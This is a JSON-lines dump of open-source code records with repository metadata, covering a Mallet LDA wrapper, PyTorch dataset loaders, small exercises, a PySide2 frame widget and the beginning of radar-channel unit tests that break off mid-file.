self.delete_temp_files:\n\t\t\ttry:\n\t\t\t\tlog.debug( \"Removing temporary directory %s\" % dir_tmp )\n\t\t\t\tshutil.rmtree(dir_tmp)\n\t\t\texcept OSError as e:\n\t\t\t\tlog.warning( \"Failed to remove temporary directory - %s\" % str(e) )\n\n\tdef rank_terms( self, topic_index, top = -1 ):\n\t\t\"\"\"\n\t\tReturn the top ranked terms for the specified topic, generated during the last LDA run.\n\t\t\"\"\"\n\t\tif self.topic_rankings is None:\n\t\t\traise ValueError(\"No results for previous run available\")\n\t\tif len(self.topic_rankings[topic_index]) < top:\n\t\t\treturn self.topic_rankings[topic_index]\n\t\treturn self.topic_rankings[topic_index][0:top]\n\n\tdef generate_partition( self ):\n\t\tif self.partition is None:\n\t\t\traise ValueError(\"No results for previous run available\")\n\t\treturn self.partition\n\n\tdef __write_documents( self, X, dir_tmp ):\n\t\t\"\"\"\n\t\tWrite documents to temporary file, for parsing by Mallet.\n\t\t\"\"\"\n\t\tlog.debug( \"Writing temporary files to %s\" % dir_tmp )\n\t\t# Write documents, one per line\n\t\tcorpus_path = os.path.join( dir_tmp, \"corpus.txt\" )\n\t\tf = open( corpus_path, \"w\")\n\t\tfor row in range( X.shape[0] ):\n\t\t\tv = X.getrow( row )\n\t\t\tdoc_tokens = []\n\t\t\tfor pos in range(v.nnz):\n\t\t\t\t# just in case the data has been normalized...\n\t\t\t\tfreq = max( 1, int(v.data[pos]) )\n\t\t\t\ttoken = \"%d\" % v.indices[pos]\n\t\t\t\tfor i in range(freq):\n\t\t\t\t\tdoc_tokens.append( token )\n\t\t\tf.write( \" \".join( doc_tokens ) )\n\t\t\tf.write(\"\\n\")\n\t\tf.close()\n\t\treturn corpus_path\n\n\tdef __import_data( self, corpus_path, dir_tmp ):\n\t\t\"\"\"\n\t\tRun the Mallet pre-processing step.\n\t\t\"\"\"\n\t\tlog.debug( \"Importing data into Mallet format... \" )\n\t\tmallet_data_path = os.path.join( dir_tmp, \"corpus.mallet\" )\n\t\tmallet_cmd = \"%s import-file --keep-sequence --token-regex '\\S+' --input %s --output %s\" % ( self.mallet_path, corpus_path, mallet_data_path )\n\t\tcall(mallet_cmd, shell=True)\n\t\treturn mallet_data_path\n\n\tdef __run_mallet( self, k, mallet_data_path, dir_tmp ):\n\t\t\"\"\"\n\t\tRun the Mallet LDA step.\n\t\t\"\"\"\n\t\tmallet_terms_path = os.path.join( dir_tmp, \"topic_terms.txt\" )\n\t\tmallet_docs_path = os.path.join( dir_tmp, \"topic_docs.txt\" )\n\t\tmallet_weights_path = os.path.join( dir_tmp, \"topic_term_weights.txt\" )\n\t\tmallet_args = [self.mallet_path,\n\t\t\t'train-topics',\n\t\t\t'--input',\n\t\t\tmallet_data_path,\n\t\t\t'--output-topic-keys',\n\t\t\tmallet_terms_path,\n\t\t\t'--output-doc-topics',\n\t\t\tmallet_docs_path,\n\t\t\t'--topic-word-weights-file',\n\t\t\tmallet_weights_path,\n\t\t\t'--num-topics',\n\t\t\tk, \n\t\t\t'--num-iterations', \n\t\t\tself.max_iters,\n\t\t\t'--num-top-words', \n\t\t\tself.top,\n\t\t\t'--show-topics-interval 1000', \n\t\t\t'--optimize-interval ', \n\t\t\tself.optimize_interval,\n\t\t\t'--optimize-burn-in 200', \n\t\t\t'--use-symmetric-alpha false', \n\t\t\t'--alpha',\n\t\t\tself.lda_alpha,\n\t\t\t'--beta',\n\t\t\tself.lda_beta, \n\t\t\t'--num-threads ',\n\t\t\tself.num_threads,\n\t\t\t'--random-seed',\n\t\t\tself.seed\n\t\t\t]\n\t\tlog.debug( \"Running Mallet (k=%d alpha=%.3f beta=%.3f optimize_interval=%d threads=%d seed=%s)... \" % ( k, self.lda_alpha, self.lda_beta, self.optimize_interval, self.num_threads, self.seed ) )\n\t\tmallet_cmd = ' '.join([str(x) for x in mallet_args])\n\t\t#log.debug( mallet_cmd )\n\t\tcall(mallet_cmd, shell=True)\n\t\treturn (mallet_terms_path, mallet_docs_path, mallet_weights_path)\n\n\tdef __parse_topics( self, mallet_terms_path ):\n\t\trankings = []\n\t\twith open(mallet_terms_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tranking = []\n\t\t\t\tif len(parts) > 2:\n\t\t\t\t\tfor token in parts[2].strip().split(\" \"):\n\t\t\t\t\t\tterm_index = int(token)\n\t\t\t\t\t\tranking.append( term_index )\n\t\t\t\trankings.append( ranking )\n\t\treturn rankings\n\n\tdef __parse_document_weights( self, num_docs, mallet_docs_path ):\n\t\tpartition = list(0 for i in range(num_docs)) \n\t\tlog.debug(\"Reading LDA document weights from %s\" % mallet_docs_path)\n\t\twith open(mallet_docs_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tif len(parts) < 3:\n\t\t\t\t\tcontinue\n\t\t\t\tdoc_index = int(parts[0])\n\t\t\t\t# find the topic with the max weight\n\t\t\t\tweights = []\n\t\t\t\tfor p in parts[2:]:\n\t\t\t\t\tweights.append( float(p) )\n\t\t\t\tweights = np.array(weights)\n\t\t\t\tpartition[doc_index] = weights.argmax()\n\t\treturn partition\n\n\tdef __rerank_terms( self, num_terms, k, mallet_weights_path, eps = 1e-9 ):\n\t\t\"\"\"\n\t\tImplements the term re-weighting method proposed by Blei and Lafferty.\n\t\t\"\"\"\n\t\tlog.debug( \"Reweighting terms ...\" )\n\t\t# Parse weights for all terms and topics\n\t\tW = np.zeros( (num_terms, k) )\n\t\twith open(mallet_weights_path) as f:\n\t\t\tlines = [line.rstrip() for line in f]\n\t\t\tfor l in lines:\n\t\t\t\tif len(l) == 0 or l.startswith(\"#\"):\n\t\t\t\t\tcontinue\n\t\t\t\tparts = l.split(\"\\t\")\n\t\t\t\tif len(parts) < 3:\n\t\t\t\t\tcontinue\n\t\t\t\ttopic_index = int(parts[0])\n\t\t\t\tterm_index = int(parts[1])\t\t\n\t\t\t\tW[term_index,topic_index] = float(parts[2])\n\t\t# Calculate geometric means\n\t\tgmeans = gmean( W, axis = 1 )\n\t\t# Reweight the terms\n\t\t# TODO: vectorize this\n\t\tfor row in range(num_terms):\n\t\t\tif gmeans[row] <= eps or np.isnan( gmeans[row] ):\n\t\t\t\tcontinue\n\t\t\tfor col in range(k):\n\t\t\t\tif W[row,col] <= eps:\n\t\t\t\t\tcontinue\n\t\t\t\tlp = np.log( W[row,col] / gmeans[row] )\n\t\t\t\tif np.isnan( lp ):\n\t\t\t\t\tcontinue\n\t\t\t\tW[row,col] = W[row,col] * lp\n\t\t# Get new term rankings per topic\n\t\trankings = []\n\t\tfor topic_index in range(k):\n\t\t\tranking = np.argsort( W[:,topic_index] )[::-1].tolist()\n\t\t\trankings.append( ranking )\n\t\treturn rankings\n\n\n","repo_name":"derekgreene/topic-stability","sub_path":"unsupervised/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":7328,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"61"} +{"seq_id":"39513086037","text":"'''Проверка валидности порта сервера'''\r\n\r\n\r\nclass Port:\r\n def __set__(self, instance, value):\r\n if not 1023 < value < 65536:\r\n print(\r\n f'Port error. Port {value} is not valid. Valid addresses from 1024 to 65535.')\r\n exit(1)\r\n else:\r\n print('GOOD')\r\n instance.__dict__[self.name] = value\r\n\r\n def __set_name__(self, owner, name):\r\n self.name = name\r\n","repo_name":"FuckingSherlock/Async_Chat","sub_path":"server/descr.py","file_name":"descr.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28426689634","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n-------------------------------------------------\r\n File Name: dataset\r\n Author : Hengrong LAN\r\n Date: 2018/12/26\r\n-------------------------------------------------\r\n Change Activity:\r\n 2018/12/26:\r\n-------------------------------------------------\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport torch\r\nimport scipy\r\nimport os\r\nimport os.path\r\nimport torchvision.transforms as transforms\r\nimport torch.utils.data as data\r\nfrom torch.utils.data import DataLoader\r\nimport scipy.io as scio\r\n\r\n\r\ndef np_range_norm(image, maxminnormal=True, range1=True):\r\n\r\n if image.ndim == 2 or (image.ndim == 3 and image.shape[0] == 1):\r\n if maxminnormal:\r\n _min = image.min()\r\n _range = image.max() - image.min()\r\n narmal_image = (image - _min) / _range\r\n if range1:\r\n narmal_image = (narmal_image - 0.5) * 2\r\n else:\r\n _mean = image.mean()\r\n _std = image.std()\r\n narmal_image = (image - _mean) / _std\r\n\r\n return narmal_image\r\n\r\n\r\n\r\nclass ReconDataset(data.Dataset):\r\n __inputdata = []\r\n __outputimg = []\r\n __outputdata = []\r\n\r\n def __init__(self,root, train=True,transform=None):\r\n self.__inputdata = []\r\n self.__outputdata = []\r\n self.__outputimg = []\r\n\r\n self.root = os.path.expanduser(root)\r\n self.transform = transform\r\n self.train = train\r\n if train:\r\n folder = root + \"Train/\"\r\n else:\r\n folder = root + \"Test/\"\r\n \r\n \r\n \r\n for file in os.listdir(folder):\r\n #print(file)\r\n matdata = scio.loadmat(folder + file)\r\n prt = matdata['prt']\r\n\r\n nviews, _, _ = prt.shape\r\n for index in range(0,nviews):\r\n prt[index,:,:]=np_range_norm(prt[index,:,:], maxminnormal=False, range1=False)\r\n out_data = np.concatenate([prt[0:48,:,:],prt[80:,:,:]])\r\n pnum = np.sum(prt,axis=0)\r\n self.__inputdata.append(prt[48:80,:,:])\r\n\r\n self.__outputdata.append(out_data)\r\n \r\n self.__outputimg.append(pnum[np.newaxis,:,:])\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n\r\n def __getitem__(self, index):\r\n\r\n rawdata = self.__inputdata[index] \r\n out_rawdata =self.__outputdata[index] #.reshape((1,1,2560,120))\r\n\r\n DAS = self.__outputimg[index]\r\n \r\n\r\n rawdata = torch.Tensor(rawdata)\r\n out_rawdata = torch.Tensor(out_rawdata)\r\n DAS = torch.Tensor(DAS)\r\n\r\n return rawdata, out_rawdata, DAS\r\n\r\n def __len__(self):\r\n return len(self.__inputdata)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n dataset_pathr = 'D:/detector_synthesis/brain/'\r\n\r\n mydataset = ReconDataset(dataset_pathr,train=False)\r\n #print(mydataset.__getitem__(3))\r\n train_loader = DataLoader(\r\n mydataset,\r\n batch_size=1, shuffle=True)\r\n batch_idx, (rawdata, out_rawdata,DAS) = list(enumerate(train_loader))[0]\r\n print(rawdata.size())\r\n print(out_rawdata.size())\r\n print(rawdata.max())\r\n print(rawdata.min())\r\n print(mydataset.__len__())\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"chenyilan/BSR-Net","sub_path":"utils/mydataset1.py","file_name":"mydataset1.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"35105671741","text":"def fizz_buzz(number):\r\n if (number % 5 == 0) and (number % 3 == 0):\r\n return \"Fizz Buzz\"\r\n if number % 3 == 0:\r\n return \"Fizz\"\r\n if number % 5 == 0:\r\n return \"Buzz\"\r\n return f\"{number}\"\r\n\r\n\r\ndef emoji_converter(sentence_):\r\n words = sentence_.split(\" \")\r\n emoji_collection = {\r\n \":)\": \" 😊\",\r\n \":D\": \" 😃\",\r\n \":(\": \" ☹\",\r\n \":o\": \" 😯\"\r\n }\r\n output = \"\"\r\n for word in words:\r\n output += f\" {emoji_collection.get(word, word)}\"\r\n return output\r\n","repo_name":"hiimmuc/python_learn_part2","sub_path":"funtion_.py","file_name":"funtion_.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12926296254","text":"# from automl_workflow.api import DataLoader\n\nimport torch\nimport os\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\n\nclass MyDataLoader(object):\n \"\"\"TODO: default PyTorch dataloader for train, validation, test, etc.\"\"\"\n \n def __call__(self, dataset, train=True):\n pt_dataloader = torch.utils.data.DataLoader(dataset, batch_size=4,\n shuffle=train, num_workers=2)\n return pt_dataloader\n\n# DEMO\n\n'''\nFor the Dataset to be processed by the PyTorch Dataloader, we need to implement\nthe `__len__` method and the `__getitem__` method.\n'''\nclass FaceDataSet(Dataset):\n \"\"\"Face Landmarks dataset from pytorch tutorial.\"\"\"\n\n def __init__(self, csv_file, root_dir, transform=None):\n \"\"\"\n Args:\n csv_file (string): Path to the csv file with annotations.\n root_dir (string): Directory with all the images.\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.landmarks_frame = pd.read_csv(csv_file)\n self.root_dir = root_dir\n self.transform = transform\n\n # must implement this method\n def __len__(self):\n return len(self.landmarks_frame)\n\n # must implement this method\n def __getitem__(self, idx):\n if torch.is_tensor(idx):\n idx = idx.tolist()\n\n img_name = os.path.join(self.root_dir,\n self.landmarks_frame.iloc[idx, 0])\n image = io.imread(img_name)\n landmarks = self.landmarks_frame.iloc[idx, 1:]\n landmarks = np.array([landmarks])\n landmarks = landmarks.astype('float').reshape(-1, 2)\n sample = {'image': image, 'landmarks': landmarks}\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n\n'''\nCustom implementation of ToTensor that process the output of the dataset. \nThe process is necessary because we also include auxiliary data of the dataset\nin this demo (landmark). \n'''\nclass ToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n # major method to be implemented\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = image.transpose((2, 0, 1))\n return {'image': torch.from_numpy(image),\n 'landmarks': torch.from_numpy(landmarks)}\n\n'''\nCustom implementation of Rescale that process the output of the dataset. \n'''\nclass Rescale(object):\n \"\"\"Rescale the image in a sample to a given size.\n\n Args:\n output_size (tuple or int): Desired output size. If tuple, output is\n matched to output_size. If int, smaller of image edges is matched\n to output_size keeping aspect ratio the same.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple))\n self.output_size = output_size\n\n def __call__(self, sample):\n image, landmarks = sample['image'], sample['landmarks']\n\n h, w = image.shape[:2]\n if isinstance(self.output_size, int):\n if h > w:\n new_h, new_w = self.output_size * h / w, self.output_size\n else:\n new_h, new_w = self.output_size, self.output_size * w / h\n else:\n new_h, new_w = self.output_size\n\n new_h, new_w = int(new_h), int(new_w)\n\n img = transform.resize(image, (new_h, new_w))\n\n # h and w are swapped for landmarks because for images,\n # x and y axes are axis 1 and 0 respectively\n landmarks = landmarks * [new_w / w, new_h / h]\n\n return {'image': img, 'landmarks': landmarks}\n\n\ndef face_dataset_demo():\n # Demo for using this face dataset\n composed = transforms.Compose([Rescale((224, 224)), ToTensor()])\n transformed_dataset = FaceDataSet(csv_file='faces/face_landmarks.csv',\n root_dir='faces/',\n transform=composed)\n\n for i in range(len(transformed_dataset)):\n sample = transformed_dataset[i]\n print(i, sample['image'].size(), sample['landmarks'].size())\n if i == 3:\n print('-' * 10)\n break\n\n dataloader = DataLoader(transformed_dataset, batch_size=4,\n shuffle=True, num_workers=0)\n \n for i_batch, sample_batched in enumerate(dataloader):\n print(i_batch, sample_batched['image'].size(), sample_batched['landmarks'].size())\n\n# face_dataset_demo()\n\n\n### Import CIFAR-10 training data loader ###\n\nfrom automl_workflow.cifar10_data_loader import trainloader, testloader, trainset, testset\n\nMyTrainSet = lambda: trainset\nMyTestSet = lambda: testset\nMyTrainDataLoader = lambda: trainloader\nMyTestDataLoader = lambda: testloader","repo_name":"zhengying-liu/automl-workflow","sub_path":"automl_workflow/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"23551874321","text":"data = open('B-large.in','r')\r\nd = open('B-large.out','w')\r\n\r\ncases = int(data.readline())\r\nfor j in range(cases):\r\n num = [int(x) for x in str(int(data.readline()))]\r\n for i in range(len(num) -1):\r\n if num[i] > num[i+1] and num[i] == 1:\r\n num = [ 9 for x in range(len(num))];num[0] = 0\r\n elif num[i] > num[i+1]:\r\n for k in range(len(num)):\r\n if num[k] == num[i]:\r\n num[k] -= 1;num[k+1:] = [ 9 for x in range(k+1,len(num))]\r\n break\r\n ans = int(\"\".join(str(x) for x in num))\r\n print >>d,('Case #' + str(j+1) + ': ' + str(ans))\r\nd.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1190.py","file_name":"1190.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3238202136","text":"# Need to use Morris Traversal to achieve Space in O(1)\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def recoverTree(self, root: TreeNode) -> None:\n \"\"\"\n Do not return anything, modify root in-place instead.\n \"\"\"\n # using inorder to find uncommon place in BST\n # uncommon means the element in order a, b => b < a\n # if one uncommon place is found, swap it with the previous node\n # if two uncommon place is found, just swap them\n \n def inOrder(root, l):\n if root.left != None:\n inOrder(root.left, l)\n l.append(root)\n print(l[-1].val)\n if root.right != None:\n inOrder(root.right, l)\n \n inOrderList = []\n inOrder(root, inOrderList)\n uncommon = []\n for i in range(1, len(inOrderList)):\n if inOrderList[i].val < inOrderList[i-1].val:\n uncommon.append(inOrderList[i-1])\n uncommon.append(inOrderList[i])\n \n if len(uncommon) == 2:\n uncommon[0].val, uncommon[1].val = uncommon[1].val, uncommon[0].val\n else:\n uncommon[0].val, uncommon[-1].val = uncommon[-1].val, uncommon[0].val\n \n ","repo_name":"chien-wei/LeetCode","sub_path":"0099_Recover_Binary_Search_Tree.py","file_name":"0099_Recover_Binary_Search_Tree.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15530313093","text":"from PySide2 import QtWidgets, QtCore, QtGui\n\n__author__ = \"Ryan Robinson\"\n\n\nclass FrameWidget(QtWidgets.QWidget):\n \"\"\"A Widget that attempts to mimic mayas frameLayout\n\n Notes:\n This is a widget rather than a layout so it can be moved\n from place to place where as a layout cannot be moved in Qt.\n\n This background color will be set from the current themes\n button color.\n\n \"\"\"\n\n def __init__(self, text=\"\", collapsible=False, parent=None):\n QtWidgets.QWidget.__init__(self, parent)\n\n layout = QtWidgets.QVBoxLayout()\n layout.setContentsMargins(0, 0, 0, 0)\n layout.setSpacing(0)\n self._title_widget = _FrameTitle(text)\n layout.addWidget(self._title_widget)\n\n # The main frame that contains the items added to the widget\n self._content_widget = QtWidgets.QFrame()\n # The main layout items will be added to\n self._content_layout = QtWidgets.QVBoxLayout()\n self._content_layout.setContentsMargins(0, 0, 0, 0)\n self._content_widget.setLayout(self._content_layout)\n\n layout.addWidget(self._content_widget)\n QtWidgets.QWidget.setLayout(self, layout)\n\n self._title_widget.onCollapse.connect(self._on_title_pressed)\n self.setCollapsible(collapsible)\n\n def _on_title_pressed(self, collapse):\n self._content_widget.setVisible(not collapse)\n\n def setText(self, text):\n \"\"\"Set the text diplayed in the title\"\"\"\n self._title_widget.setText(text)\n\n def text(self):\n \"\"\"Get the current text displayed in the title \"\"\"\n return self._title_widget.text()\n\n def setCollapsible(self, value):\n \"\"\"Set whether the widget is collapsible\"\"\"\n self._title_widget.setCollapsible(value)\n\n def collapsible(self):\n \"\"\"Get whether the widget is collapsible\"\"\"\n return self._title_widget.collapsible()\n\n def setCollapsed(self, value):\n \"\"\"Set the collapsed state\n\n Args:\n value(bool): state of collapse\n \"\"\"\n self._title_widget.setCollapsed(value)\n\n def collapsed(self):\n \"\"\"Get the collapsed state\n\n Returns:\n bool:\n \"\"\"\n return self._title_widget.collapsed()\n\n def addLayout(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addLayout(*args, **kwargs)\n\n def addWidget(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addWidget(*args, **kwargs)\n\n def removeWidget(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.removeWidget(*args, **kwargs)\n\n def removeItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.removeItem(*args, **kwargs)\n\n def addItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addItem(*args, **kwargs)\n\n def addSpacerItem(self, *args, **kwargs):\n \"\"\"Convenience method to add/remove items from the widget\n See Qt Docs for signatures\n \"\"\"\n self._content_layout.addSpacerItem(*args, **kwargs)\n\n def layout(self):\n \"\"\"Get the main layout items are added to\"\"\"\n return self._content_layout\n\n def setLayout(self, layout):\n \"\"\"Set the main layout to the given\"\"\"\n self._content_layout = layout\n self._content_widget.setLayout(layout)\n\n def children(self):\n \"\"\"Convenience method to get the children of the current layout\n \"\"\"\n return self._content_layout.children()\n\n\nclass _FrameTitle(QtWidgets.QWidget):\n \"\"\"The widget that handles the display of the title and the\n collapsed state of the :class:`FrameWidget`\n\n Args:\n text (str): text to set\n \"\"\"\n\n onCollapse = QtCore.Signal(bool)\n\n def __init__(self, text):\n\n QtWidgets.QWidget.__init__(self)\n # The long edge of the arrow |>\n self._arrow_height = 11\n # The distance of the point from the long edge |-\n self._arrow_depth = 6\n # The base left margin used to offset the text and arrow\n self._base_margin = 10\n # Roundness of borders\n self.border_radius = 2\n self._text = \"\"\n\n self._collapsible = True\n self._collapsed = False\n\n self.setFixedHeight(22)\n self.setMinimumSize(QtCore.QSize(20, 22))\n self.setText(text)\n\n def setText(self, text):\n \"\"\"Set the text of the frame\"\"\"\n self._text = text\n self.repaint()\n\n def text(self):\n \"\"\"Get the current text of the frame\"\"\"\n return self._text\n\n def setCollapsible(self, value):\n \"\"\"Set the widget as collapsible\"\"\"\n self._collapsible = value\n if not value:\n # Force show the contents if we are not collapsible\n self.setCollapsed(False)\n else:\n self.repaint()\n\n def collapsible(self):\n \"\"\"Get whether the widget is collapsible or not\"\"\"\n return self._collapsible\n\n def setCollapsed(self, value):\n \"\"\"Set the collapsed state\"\"\"\n self._collapsed = value\n self.repaint()\n self.onCollapse.emit(value)\n\n def collapsed(self):\n \"\"\"Get the collapsed state\"\"\"\n return self._collapsed\n\n def mousePressEvent(self, event):\n \"\"\"Override to handle the click functionality\"\"\"\n if self._collapsible:\n self.setCollapsed(not self._collapsed)\n QtWidgets.QWidget.mouseReleaseEvent(self, event)\n\n def paintEvent(self, event):\n \"\"\"Override paint event to display custom options\"\"\"\n # Initialize everything we need\n rect = event.rect() # type: QtCore.QRect\n painter = QtGui.QPainter(self)\n palette = self.palette() # type: QtGui.QPalette\n\n transparent_pen = QtGui.QPen(QtGui.QColor(0, 0, 0, 0))\n # Because the font is later set as bold. Store this to reset back\n orig_font = painter.font() # type: QtGui.QFont\n\n # Handle drawing as a \"flat\" button\n btn_rect = rect.adjusted(0, 1, 0, -1)\n painter.setBrush(palette.button())\n painter.setPen(transparent_pen)\n painter.setBrush(palette.button())\n painter.drawRoundedRect(btn_rect, self.border_radius, self.border_radius, QtCore.Qt.AbsoluteSize)\n\n # Draw the text as bold with the with the windowText color\n text_margin = self._base_margin\n # If this is collapsible offset the text event more\n if self._collapsible:\n text_margin += 18\n text_rect = btn_rect.adjusted(text_margin, 1, 0, 0)\n painter.setPen(QtGui.QPen(palette.color(palette.WindowText)))\n font = painter.font() # type: QtGui.QFont\n font.setBold(font.Bold)\n painter.setFont(font)\n painter.drawText(text_rect,\n QtCore.Qt.AlignLeft | QtCore.Qt.AlignVCenter,\n self._text)\n painter.setFont(orig_font)\n\n if not self._collapsible:\n return\n\n # Handle the collapsed indicator\n if self._collapsed:\n offset = (btn_rect.height() - self._arrow_height) / 2.0\n arrow = [\n QtCore.QPointF(self._base_margin, offset),\n QtCore.QPointF(self._base_margin + self._arrow_depth,\n offset + (self._arrow_height / 2.0)),\n QtCore.QPointF(self._base_margin, offset + self._arrow_height),\n ]\n else:\n margin = self._base_margin - 3\n offset = (btn_rect.height() - self._arrow_depth) / 2.0\n arrow = [\n QtCore.QPointF(margin, offset),\n QtCore.QPointF(margin + (self._arrow_height / 2.0),\n offset + self._arrow_depth),\n QtCore.QPointF(margin + self._arrow_height, offset),\n ]\n\n painter.setPen(transparent_pen)\n painter.setBrush(palette.buttonText())\n painter.drawPolygon(arrow)\n","repo_name":"dotRyan/dotblox","sub_path":"python/dotblox/qt/framewidget.py","file_name":"framewidget.py","file_ext":"py","file_size_in_byte":8385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5580775187","text":"# -*- coding: utf-8 -*-\n\"\"\"Test Radar Channel\"\"\"\n\nfrom __future__ import annotations\nimport unittest\nfrom unittest.mock import patch, Mock, PropertyMock\n\nimport numpy as np\nfrom numpy.random import default_rng\nfrom numpy.testing import assert_array_almost_equal, assert_array_equal\nfrom scipy.constants import pi, speed_of_light\n\nfrom hermespy.channel import SingleTargetRadarChannel, MultiTargetRadarChannel, VirtualRadarTarget, PhysicalRadarTarget, FixedCrossSection\nfrom hermespy.channel.radar_channel import MultiTargetRadarChannelRealization, SingleTargetRadarChannelRealization, RadarChannelBase, RadarChannelRealization, RadarPathRealization, RadarInterferenceRealization, RadarTargetRealization\nfrom hermespy.core import Direction, FloatingError, IdealAntenna, Moveable, Signal, Transformation, UniformArray\nfrom hermespy.simulation import SimulatedDevice\nfrom unit_tests.core.test_factory import test_yaml_roundtrip_serialization\n\n\n__author__ = \"Andre Noll Barreto\"\n__copyright__ = \"Copyright 2023, Barkhausen Institut gGmbH\"\n__credits__ = [\"Andre Noll Barreto\", \"Jan Adler\"]\n__license__ = \"AGPLv3\"\n__version__ = \"1.1.0\"\n__maintainer__ = \"Jan Adler\"\n__email__ = \"jan.adler@barkhauseninstitut.org\"\n__status__ = \"Prototype\"\n\n\nclass RadarChannelRealizationMock(RadarChannelRealization):\n \"\"\"Radar channel realization for base class testing\"\"\"\n \n def null_hypothesis(self, num_samples: int, sampling_rate: float) -> RadarChannelRealizationMock:\n\n impulse_response = self.ImpulseResponse([], self.gain, num_samples, sampling_rate, self.channel.transmitter, self.channel.receiver)\n return RadarChannelRealizationMock(self.channel, self.gain, impulse_response)\n\n def ground_truth(self) -> np.ndarray:\n return np.empty((0, 3), dtype=np.float_)\n\n\nclass RadarChannelMock(RadarChannelBase[RadarChannelRealizationMock]):\n \"\"\"Radar channel for base class testing\"\"\"\n \n def realize(self, num_samples: int, sampling_rate: float) -> RadarChannelRealizationMock:\n \n global_position = np.array([1, 1, 1], dtype=np.float_) \n target_realization = RadarTargetRealization(0, 0, 0, 1, 2, np.eye(self.receiver.antennas.num_receive_antennas, self.transmitter.antennas.num_transmit_antennas), global_position, global_position)\n impulse_response = RadarChannelRealization.ImpulseResponse([target_realization], self.gain, num_samples, sampling_rate, self.transmitter, self.receiver)\n\n return RadarChannelRealizationMock(self, self.gain, impulse_response)\n\n\nclass TestFixedCrossSection(unittest.TestCase):\n \"\"\"Test the fixed radar cross section model\"\"\"\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.23454)\n \n def test_init(self) -> None:\n \"\"\"Class initialization parameters should be properly stored as attributes\"\"\"\n \n self.assertEqual(1.23454, self.cross_section.cross_section)\n \n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = 2.34455\n self.cross_section.cross_section = expected_cross_section\n \n self.assertEqual(expected_cross_section, self.cross_section.cross_section)\n \n def test_cross_section_validation(self) -> None:\n \"\"\"Cross section property setter should raise a ValueError on invalid arguments\"\"\"\n\n with self.assertRaises(ValueError):\n self.cross_section.cross_section = -1.\n \n def test_get_cross_section(self) -> None:\n \"\"\"Getting a cross section should return the fixed value\"\"\"\n \n impinging_direction = Direction.From_Spherical(0., 0.)\n emerging_direction = Direction.From_Spherical(1., 1.)\n \n cross_section = self.cross_section.get_cross_section(impinging_direction, emerging_direction)\n self.assertEqual(1.23454, cross_section)\n\n \nclass TestVirtualRadarTarget(unittest.TestCase):\n \n def setUp(self) -> None:\n \n self.cross_section = FixedCrossSection(1.234)\n self.velocity = np.array([1, 2, 3], dtype=float)\n self.pose = Transformation.From_Translation(np.array([2, 3, 4]))\n \n self.target = VirtualRadarTarget(self.cross_section, self.velocity, self.pose)\n \n def test_init(self) -> None:\n \"\"\"Initialization paramters should be properly stored as class attributes\"\"\"\n \n self.assertIs(self.cross_section, self.target.cross_section)\n assert_array_almost_equal(self.velocity, self.target.velocity)\n assert_array_almost_equal(self.pose, self.target.pose)\n \n def test_cross_section_setget(self) -> None:\n \"\"\"Cross section property getter should return setter argument\"\"\"\n \n expected_cross_section = FixedCrossSection(2.345)\n self.target.cross_section = expected_cross_section\n \n self.assertIs(expected_cross_section, self.target.cross_section)\n \n def 